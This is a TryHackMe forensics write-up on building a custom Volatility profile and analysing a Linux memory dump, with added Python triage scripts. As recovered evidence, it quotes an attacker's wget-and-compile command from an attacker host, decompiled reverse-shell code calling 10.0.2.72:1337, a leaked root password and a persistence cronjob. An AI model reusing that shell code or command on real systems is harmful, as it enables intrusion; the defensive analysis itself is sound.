
Profiles Write-up - TryHackMe

Creating a custom profile for Volatility to analyze a memory dump.

Profiles is a memory forensics challenge on TryHackMe. The difficult part of this challenge is creating a custom profile for the memory dump.

Information Gathering

First of all, obtain the kernel banner from the memory dump with the Volatility 3 banners plugin.

sarp@IdeaPad:/tmp$ vol -f linux.mem banners
Volatility 3 Framework 2.7.0
Progress:  100.00		PDB scanning finished                  
Offset	Banner

0x2f9c4c88	Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) #183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 (Ubuntu 5.4.0-166.183-generic 5.4.252)

The memory dump is from a Linux machine running Ubuntu 20.04.2 LTS with kernel version 5.4.0-166-generic. Since Volatility ships no profile for this kernel version, we need to build a custom one.

Creating a Custom Profile

Creating a custom profile requires the following information:

  • Kernel version
  • OS version

Both values are already known from the banner. We can use Docker to build the profile in a clean Ubuntu 20.04 container.

docker run -it -v /tmp:/app ubuntu:20.04

Install the necessary packages.

apt update && apt-get install dwarfdump build-essential linux-headers-5.4.0-166-generic linux-image-5.4.0-166-generic git zip -y

Clone the Volatility repository.

git clone https://github.com/volatilityfoundation/volatility.git && cd /volatility/tools/linux

We need to modify two files to create a custom profile. First, modify the Makefile file.

root@8726662de51e:/volatility/tools/linux# cat Makefile
obj-m += module.o
KDIR ?= /
KVER ?= $(shell uname -r)

-include version.mk

all: dwarf 

dwarf: module.c
	$(MAKE) -C $(KDIR)/lib/modules/$(KVER)/build CONFIG_DEBUG_INFO=y M="$(PWD)" modules
	dwarfdump -di module.ko > module.dwarf
	$(MAKE) -C $(KDIR)/lib/modules/$(KVER)/build M="$(PWD)" clean

clean:
	$(MAKE) -C $(KDIR)/lib/modules/$(KVER)/build M="$(PWD)" clean
	rm -f module.dwarf

Since uname -r inside the container reports the host's kernel rather than the dump's, we need to set the KVER variable explicitly to 5.4.0-166-generic.

KVER ?= 5.4.0-166-generic

The second file to modify is the module.c file.

#include <linux/module.h>
#include <linux/version.h>

MODULE_LICENSE("GPL"); // Add this line here

#include <linux/ioport.h>
#include <linux/fs_struct.h>
#include <linux/fs.h>
#include <linux/proc_fs.h>

Then compile the module.

root@8726662de51e:/volatility/tools/linux# make
make -C //lib/modules/5.4.0-166-generic/build CONFIG_DEBUG_INFO=y M="/volatility/tools/linux" modules
make[1]: Entering directory '/usr/src/linux-headers-5.4.0-166-generic'
  CC [M]  /volatility/tools/linux/module.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC [M]  /volatility/tools/linux/module.mod.o
  LD [M]  /volatility/tools/linux/module.ko
make[1]: Leaving directory '/usr/src/linux-headers-5.4.0-166-generic'
dwarfdump -di module.ko > module.dwarf
make -C //lib/modules/5.4.0-166-generic/build M="/volatility/tools/linux" clean
make[1]: Entering directory '/usr/src/linux-headers-5.4.0-166-generic'
  CLEAN   /volatility/tools/linux/Module.symvers
make[1]: Leaving directory '/usr/src/linux-headers-5.4.0-166-generic'

Finally, create a ZIP file containing the DWARF file and the kernel's System.map, which is located at /boot/System.map-5.4.0-166-generic.

zip newProfile.zip module.dwarf /boot/System.map-5.4.0-166-generic

Copy the ZIP file to the host machine (/app inside the container is the host's /tmp, bind-mounted when the container was started) and exit the Docker container.

cp newProfile.zip /app
exit

You can download the custom profile from here.
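The whole profile-building procedure above is driven by one string, the kernel banner. The following script is an added example (not code from the original post or from the Volatility project) that derives everything the steps need from that banner: the kernel release for KVER, the matching linux-headers and linux-image package names, the base image tag, the Makefile and module.c edits, and the two files that go into the ZIP. The sample banner, Makefile fragment and module.c fragment are copied from this write-up; treating the "~20.04" suffix of the gcc package version as the Ubuntu series is a heuristic of mine.

```python
import re

# Constructed sample inputs, copied from the banner and the two files shown in
# this write-up, so the script runs offline.
BANNER = ("Linux version 5.4.0-166-generic (buildd@lcy02-amd64-011) "
          "(gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)) "
          "#183-Ubuntu SMP Mon Oct 2 11:28:33 UTC 2023 "
          "(Ubuntu 5.4.0-166.183-generic 5.4.252)")

MAKEFILE = """obj-m += module.o
KDIR ?= /
KVER ?= $(shell uname -r)

-include version.mk

all: dwarf
"""

MODULE_C = """#include <linux/module.h>
#include <linux/version.h>

#include <linux/ioport.h>
#include <linux/fs_struct.h>
"""

RELEASE_RE = re.compile(r"^Linux version (?P<release>\S+)")
# The "~20.04" suffix on the gcc package version is the Ubuntu series the
# kernel was built on; using it as the base image tag is a heuristic (assumption).
SERIES_RE = re.compile(r"ubuntu\d*~(?P<series>\d+\.\d+)")


def parse_banner(banner):
    """Pull the kernel release (what uname -r prints) and the Ubuntu series out of a banner."""
    m = RELEASE_RE.match(banner)
    if not m:
        raise ValueError("not a Linux version banner")
    series = SERIES_RE.search(banner)
    return {
        "release": m.group("release"),
        "ubuntu_series": series.group("series") if series else None,
    }


def required_packages(release):
    """Packages the build container needs; headers and image must match the dump's kernel."""
    return ["dwarfdump", "build-essential", f"linux-headers-{release}",
            f"linux-image-{release}", "git", "zip"]


def patch_makefile(text, release):
    """Pin KVER: inside a container `uname -r` reports the host kernel, not the target."""
    new, n = re.subn(r"^KVER \?= .*$", f"KVER ?= {release}", text, flags=re.M)
    if n != 1:
        raise ValueError(f"expected one KVER line, found {n}")
    return new


def patch_module_c(text):
    """Insert MODULE_LICENSE("GPL") after the version.h include (idempotent)."""
    if "MODULE_LICENSE(" in text:
        return text
    marker = "#include <linux/version.h>\n"
    if marker not in text:
        raise ValueError("module.c layout not recognised")
    return text.replace(marker, marker + '\nMODULE_LICENSE("GPL");\n', 1)


def profile_inputs(release):
    """The two files that go into the profile ZIP."""
    return ["module.dwarf", f"/boot/System.map-{release}"]


def plan(banner):
    """Everything derived from the banner, in the order the steps above use it."""
    info = parse_banner(banner)
    rel = info["release"]
    series = info["ubuntu_series"]
    return {
        "docker_image": f"ubuntu:{series}" if series else "ubuntu",
        "apt_packages": required_packages(rel),
        "makefile": patch_makefile(MAKEFILE, rel),
        "module_c": patch_module_c(MODULE_C),
        "zip_inputs": profile_inputs(rel),
    }


if __name__ == "__main__":
    p = plan(BANNER)
    print(p["docker_image"])
    print(" ".join(p["apt_packages"]))
    print(p["makefile"])
    print(p["module_c"])
```

The patch_makefile check that exactly one KVER line was rewritten matters in practice: if the Makefile layout changes upstream and nothing matches, the build silently picks up the host kernel and the resulting profile will not match the dump.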

Install Volatility2

You can refer to this blog post for instructions on installing Volatility2.

Install system dependencies

sudo apt install -y build-essential git libdistorm3-dev yara libraw1394-11 libcapstone-dev capstone-tool tzdata

Install pip for Python 2

sudo apt install -y python2 python2.7-dev libpython2-dev
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py --output get-pip.py
sudo python2 get-pip.py
sudo python2 -m pip install -U setuptools wheel

Install Volatility 2 and its Python dependencies

To install system-wide for all users, use the sudo command in front of the python2 commands.

python2 -m pip install -U distorm3 yara pycrypto pillow openpyxl ujson pytz ipython capstone
sudo python2 -m pip install yara
sudo ln -s /usr/local/lib/python2.7/dist-packages/usr/lib/libyara.so /usr/lib/libyara.so
git clone https://github.com/volatilityfoundation/volatility.git

Analyzing the Memory Dump

Lastly, copy the profile to the Volatility2 ~/volatility/volatility/plugins/overlays/linux directory.

sarp@IdeaPad:/tmp/a/volatility$ cp ../../newProfile.zip ./volatility/plugins/overlays/linux/

Now, we can analyze the memory dump using the custom profile.

sarp@IdeaPad:/tmp/a/volatility$ python2 vol.py --info
Volatility Foundation Volatility Framework 2.6.1

Profiles
--------
LinuxnewProfilex64    - A Profile for Linux newProfile x64
VistaSP0x64           - A Profile for Windows Vista SP0 x64
VistaSP0x86           - A Profile for Windows Vista SP0 x86
VistaSP1x64           - A Profile for Windows Vista SP1 x64
VistaSP1x86           - A Profile for Windows Vista SP1 x86
VistaSP2x64           - A Profile for Windows Vista SP2 x64
[...]

The custom profile is listed as LinuxnewProfilex64. Now, we can analyze the memory dump.

Question 1

What is the exposed root password?

sarp@IdeaPad:/tmp/a/volatility$ python2 vol.py -f linux.mem --profile=LinuxnewProfilex64 linux_bash
Volatility Foundation Volatility Framework 2.6.1
Pid      Name                 Command Time                   Command
-------- -------------------- ------------------------------ -------
    1076 bash                 2023-11-07 03:49:45 UTC+0000   su rootFtrccw45PHyq
    1076 bash                 2023-11-07 03:49:45 UTC+0000   sqlite3 users.db
    1076 bash                 2023-11-07 03:49:45 UTC+0000   @????U
    1076 bash                 2023-11-07 03:49:45 UTC+0000   su root
    1076 bash                 2023-11-07 03:50:11 UTC+0000   wget 10.0.2.72/shell.c && gcc shell.c -o pkexecc && rm shell.c
    1076 bash                 2023-11-07 03:50:17 UTC+0000   ./pkexecc
[...]

The root password is exposed in the bash history: it was typed directly after the username (su rootFtrccw45PHyq), so the shell recorded it as part of the command line.

Answer: Ftrccw45PHyq

Question 2

And what time was the users.db file approximately accessed? Format is YYYY-MM-DD HH:MM:SS

The access date of the users.db file is listed in the bash history as well.

    1076 bash                 2023-11-07 03:49:45 UTC+0000   sqlite3 users.db

Answer: 2023-11-07 03:49:45
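Questions 1 and 2 are both answered by reading the recovered bash history by eye. The script below is an added example (not part of the original post) that does the same triage programmatically over the linux_bash output: it parses the rows, flags a password that was typed directly after the username in an su command, reports the first time a given file name appears, and picks out the fetch-compile-delete one-liner. The sample rows are copied from this write-up; the set of known user names is my assumption, taken from /home/paco in the file listing.

```python
import re

# Constructed sample: the linux_bash rows from this write-up, pasted verbatim.
LINUX_BASH_OUTPUT = """\
Pid      Name                 Command Time                   Command
-------- -------------------- ------------------------------ -------
    1076 bash                 2023-11-07 03:49:45 UTC+0000   su rootFtrccw45PHyq
    1076 bash                 2023-11-07 03:49:45 UTC+0000   sqlite3 users.db
    1076 bash                 2023-11-07 03:49:45 UTC+0000   @????U
    1076 bash                 2023-11-07 03:49:45 UTC+0000   su root
    1076 bash                 2023-11-07 03:50:11 UTC+0000   wget 10.0.2.72/shell.c && gcc shell.c -o pkexecc && rm shell.c
    1076 bash                 2023-11-07 03:50:17 UTC+0000   ./pkexecc
"""

ROW_RE = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<name>\S+)\s+"
    r"(?P<time>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) UTC\+0000\s+(?P<cmd>.*)$")

# Assumption: the accounts that exist on the imaged host. On another dump,
# fill this from /etc/passwd or the /home listing.
KNOWN_USERS = {"root", "paco"}


def parse_linux_bash(text):
    """Turn the plugin's table into a list of {pid, name, time, cmd} rows."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append({"pid": int(m["pid"]), "name": m["name"],
                         "time": m["time"], "cmd": m["cmd"].rstrip()})
    return rows


def leaked_su_passwords(rows):
    """'su <user><password>' with no space between them: the password is in history.
    Returns (time, user, trailing text) tuples."""
    hits = []
    for r in rows:
        m = re.match(r"^su\s+(?:-\s+)?(\S+)$", r["cmd"])
        if not m:
            continue
        arg = m.group(1)
        for user in KNOWN_USERS:
            if arg != user and arg.startswith(user):
                hits.append((r["time"], user, arg[len(user):]))
    return hits


def first_seen(rows, needle):
    """Timestamp of the first command mentioning `needle` (e.g. a file name), else None."""
    for r in rows:
        if needle in r["cmd"]:
            return r["time"]
    return None


def download_and_compile(rows):
    """Fetch and compile in one command line: a drop-and-build pattern worth a closer look."""
    return [r for r in rows
            if re.search(r"\b(wget|curl)\b", r["cmd"])
            and re.search(r"\b(gcc|cc|make)\b", r["cmd"])]


def triage(text):
    rows = parse_linux_bash(text)
    return {
        "leaked_credentials": leaked_su_passwords(rows),
        "users_db_first_seen": first_seen(rows, "users.db"),
        "build_commands": [r["cmd"] for r in download_and_compile(rows)],
    }


if __name__ == "__main__":
    for key, value in triage(LINUX_BASH_OUTPUT).items():
        print(key, value)
```

Note that the timestamps linux_bash recovers are the shell's own history times, so several commands can share one second (as the first four rows do); the value is useful as an approximate access time, which is all Question 2 asks for.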

Question 3

What is the MD5 hash of the malicious file found?

The malicious file appears to be pkexecc according to the bash history. To extract it, we first locate its inode with the linux_enumerate_files plugin and then carve it with linux_find_file.

sarp@IdeaPad:/tmp/a/volatility$ python2 vol.py -f linux.mem --profile=LinuxnewProfilex64 linux_enumerate_files
Volatility Foundation Volatility Framework 2.6.1
     Inode Address Inode Number              Path
------------------ ------------------------- ----
[...]
0xffff890488360530                    655363 /srv
0xffff890488365ad0                    655361 /home
0xffff8903b21ea328                    655364 /home/paco
0xffff8903aeec80e8                    655376 /home/paco/linux.mem
               0x0 ------------------------- /home/paco/libgcc_s.so.1
               0x0 ------------------------- /home/paco/shell.c.gch
0xffff8903b2364120                    655377 /home/paco/pkexecc
               0x0 ------------------------- /home/paco/.netrc
               0x0 ------------------------- /home/paco/shell.c
               0x0 ------------------------- /home/paco/.wget-hsts
               0x0 ------------------------- /home/paco/.wgetrc
0xffff8903b21d7480                    655366 /home/paco/.bash_logout
0xffff8903b2388530                    655375 /home/paco/.sqlite_history
               0x0 ------------------------- /home/paco/.sqliterc
0xffff8903b238df18                    655374 /home/paco/users.db
               0x0 ------------------------- /home/paco/.inputrc
               0x0 ------------------------- /home/paco/bin

[...]

The inode address of the pkexecc file is 0xffff8903b2364120. We can extract it using the linux_find_file plugin.

sarp@IdeaPad:/tmp/a/volatility$ python2 vol.py -f linux.mem --profile=LinuxnewProfilex64 linux_find_file -i 0xffff8903b2364120 -O pkexec
Volatility Foundation Volatility Framework 2.6.1
sarp@IdeaPad:/tmp/a/volatility$ md5sum pkexec 
0511ccaad402d6d13ce801e1e9136ba2  pkexec

Answer: 0511ccaad402d6d13ce801e1e9136ba2

Question 4

What is the IP address and port of the malicious actor? Format is IP:Port

To reverse engineer the pkexecc file, I uploaded it to DogBolt.org, a free online decompiler. The decompiled code is as follows:

int main(unsigned long a0, unsigned long a1)
{
    unsigned long v0;  // [bp-0x48]
    unsigned int v1;  // [bp-0x3c]
    unsigned int v2;  // [bp-0x2c]
    unsigned short v3;  // [bp-0x28]
    unsigned short v4;  // [bp-0x26]
    unsigned int v5;  // [bp-0x24]

    v1 = a0;
    v0 = a1;
    v3 = 2;
    v5 = inet_addr("10.0.2.72");
    v4 = htons(1337);
    v2 = socket(2, 1, 0);
    connect(v2, &v3, 16);
    dup2(v2, 0);
    dup2(v2, 1);
    dup2(v2, 2);
    execve("/bin/sh", 0, 0);
    return 0;
}

The IP address and port of the malicious actor are revealed in the code.

Answer: 10.0.2.72:1337
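The reason the three locals v3, v4 and v5 give away the endpoint is that they sit next to each other on the stack and together form a sockaddr_in: a 2-byte family (2 is AF_INET), a 2-byte port in network order (the htons call), a 4-byte address in network order (the inet_addr call) and 8 bytes of padding, 16 bytes in total, which is exactly the length passed to connect. The following is an added example (not from the original post) that rebuilds those bytes the way the decompiled assignments leave them in memory, decodes them back to IP:port, and scans a small constructed memory blob for the same structure, which is how the endpoint can be recovered from a dump even when no decompiler is at hand. The little-endian layout of sin_family assumes an x86-64 target, as in this room.

```python
import socket
import struct

# sockaddr_in as it sits in memory: sin_family (u16, host order), sin_port (u16,
# network order), sin_addr (u32, network order), 8 bytes of zero padding.
SOCKADDR_IN_LEN = 16


def sockaddr_in_bytes(ip, port, family=socket.AF_INET):
    """Reproduce what v3 = 2, v4 = htons(port), v5 = inet_addr(ip) leave on the stack.
    Assumes a little-endian (x86-64) host for the family field."""
    return (struct.pack("<H", family)      # v3: AF_INET, host byte order
            + struct.pack("!H", port)      # v4: htons(port)
            + socket.inet_aton(ip)         # v5: inet_addr(ip)
            + bytes(8))                    # sin_zero padding


def decode_sockaddr_in(buf):
    """Turn 16 bytes of sockaddr_in back into 'ip:port'; rejects non-IPv4 families."""
    if len(buf) < SOCKADDR_IN_LEN:
        raise ValueError("buffer shorter than sockaddr_in")
    family, port_be, addr = struct.unpack("<H2s4s8x", buf[:SOCKADDR_IN_LEN])
    if family != socket.AF_INET:
        raise ValueError(f"not AF_INET (family={family})")
    port = struct.unpack("!H", port_be)[0]
    return f"{socket.inet_ntoa(addr)}:{port}"


def endpoint_from_decompiled(family, htons_arg, inet_addr_arg):
    """Assemble the three locals exactly as the decompiler showed them and decode."""
    return decode_sockaddr_in(sockaddr_in_bytes(inet_addr_arg, htons_arg, family))


def scan_for_sockaddr_in(blob):
    """Forensic helper: report plausible AF_INET sockaddr_in structures in a memory
    blob (family == 2, non-zero port, zeroed sin_zero). Returns (offset, 'ip:port')."""
    hits = []
    for off in range(0, len(blob) - SOCKADDR_IN_LEN + 1, 2):
        chunk = blob[off:off + SOCKADDR_IN_LEN]
        if chunk[:2] != b"\x02\x00" or chunk[8:16] != bytes(8):
            continue
        if chunk[2:4] == b"\x00\x00":
            continue
        hits.append((off, decode_sockaddr_in(chunk)))
    return hits


if __name__ == "__main__":
    # Values lifted from the decompiled main() above.
    print(endpoint_from_decompiled(2, 1337, "10.0.2.72"))
    # Constructed blob: some unrelated bytes around one sockaddr_in.
    blob = bytes(6) + sockaddr_in_bytes("10.0.2.72", 1337) + bytes(4)
    print(scan_for_sockaddr_in(blob))
```

The scan is deliberately strict about the padding being zero; stack garbage often leaves sin_zero untouched after the compiler's zeroing, but when it does not, loosen that check and expect more false positives.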

Question 5

What is the full path of the cronjob file and its inode number? Format is filename:inode number

When we list the files like we did in the previous question, we can see the cronjob file.

0xffff890499e90dc0                    131180 /var/spool/cron
0xffff890499fa1650                    131184 /var/spool/cron/crontabs
0xffff8903b23667a8                    131127 /var/spool/cron/crontabs/root

Answer: /var/spool/cron/crontabs/root:131127
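Questions 3 and 5 both come down to reading the linux_enumerate_files table: find a path, take its inode address for linux_find_file, or take its inode number for the answer. The script below is an added example (not code from the original post or from Volatility) that parses that table, distinguishes entries that can actually be carved from the 0x0 ones, builds the linux_find_file command in the form used in this write-up, and lists every recoverable file under a directory such as /var/spool/cron/crontabs. The sample rows are copied from this write-up; the dump file name and profile name are the ones used above.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: rows copied from the linux_enumerate_files output in this write-up.
ENUMERATE_OUTPUT = """\
     Inode Address Inode Number              Path
------------------ ------------------------- ----
0xffff8903aeec80e8                    655376 /home/paco/linux.mem
               0x0 ------------------------- /home/paco/libgcc_s.so.1
0xffff8903b2364120                    655377 /home/paco/pkexecc
               0x0 ------------------------- /home/paco/shell.c
0xffff8903b238df18                    655374 /home/paco/users.db
0xffff890499e90dc0                    131180 /var/spool/cron
0xffff890499fa1650                    131184 /var/spool/cron/crontabs
0xffff8903b23667a8                    131127 /var/spool/cron/crontabs/root
"""

ROW_RE = re.compile(r"^\s*(?P<addr>0x[0-9a-fA-F]+)\s+(?P<ino>\d+|-+)\s+(?P<path>/\S.*)$")


@dataclass
class CachedFile:
    inode_addr: int
    inode_num: Optional[int]
    path: str

    @property
    def recoverable(self):
        # 0x0 means the dentry was found but no inode is cached in the dump, so
        # linux_find_file has nothing to carve (shell.c was deleted, for instance).
        return self.inode_addr != 0 and self.inode_num is not None

    def answer(self):
        """The 'path:inode number' format Question 5 asks for."""
        return f"{self.path}:{self.inode_num}"


def parse_enumerate_files(text):
    files = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        ino = m["ino"]
        files.append(CachedFile(int(m["addr"], 16),
                                int(ino) if ino.isdigit() else None,
                                m["path"].rstrip()))
    return files


def lookup(files, path):
    for f in files:
        if f.path == path:
            return f
    return None


def find_file_command(f, outfile, dump="linux.mem", profile="LinuxnewProfilex64"):
    """The vol.py invocation to carve one recoverable entry (format used in this write-up)."""
    if not f.recoverable:
        raise ValueError(f"{f.path}: no cached inode, cannot be carved")
    return (f"python2 vol.py -f {dump} --profile={profile} linux_find_file "
            f"-i {f.inode_addr:#x} -O {outfile}")


def under(files, prefix):
    """All recoverable entries below a directory, e.g. every crontab in /var/spool/cron."""
    base = prefix.rstrip("/") + "/"
    return [f for f in files if f.path.startswith(base) and f.recoverable]


if __name__ == "__main__":
    files = parse_enumerate_files(ENUMERATE_OUTPUT)
    print(find_file_command(lookup(files, "/home/paco/pkexecc"), "pkexec"))
    for f in under(files, "/var/spool/cron/crontabs"):
        print(f.answer())
```

Checking recoverable before carving saves a round of confusion: running linux_find_file on a 0x0 entry such as /home/paco/shell.c produces nothing, which is expected once you see that the source was deleted right after compilation.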

Question 6

What command is found inside the cronjob file?

We can find the command by extracting the file.

sarp@IdeaPad:/tmp/a/volatility$ python2 vol.py -f linux.mem --profile=LinuxnewProfilex64 linux_find_file -i 0xffff8903b23667a8 -O cronjob
Volatility Foundation Volatility Framework 2.6.1
sarp@IdeaPad:/tmp/a/volatility$ cat cronjob 
* * * * * cp /opt/.bashrc /root/.bashrc

Answer: cp /opt/.bashrc /root/.bashrc

Conclusion

That’s it! The room was a bit intimidating at first because of the custom profile creation. Nevertheless, it was done. I hope you enjoyed the write-up. If you have any questions, feel free to ask on Twitter.

This post is licensed under CC BY 4.0 by the author.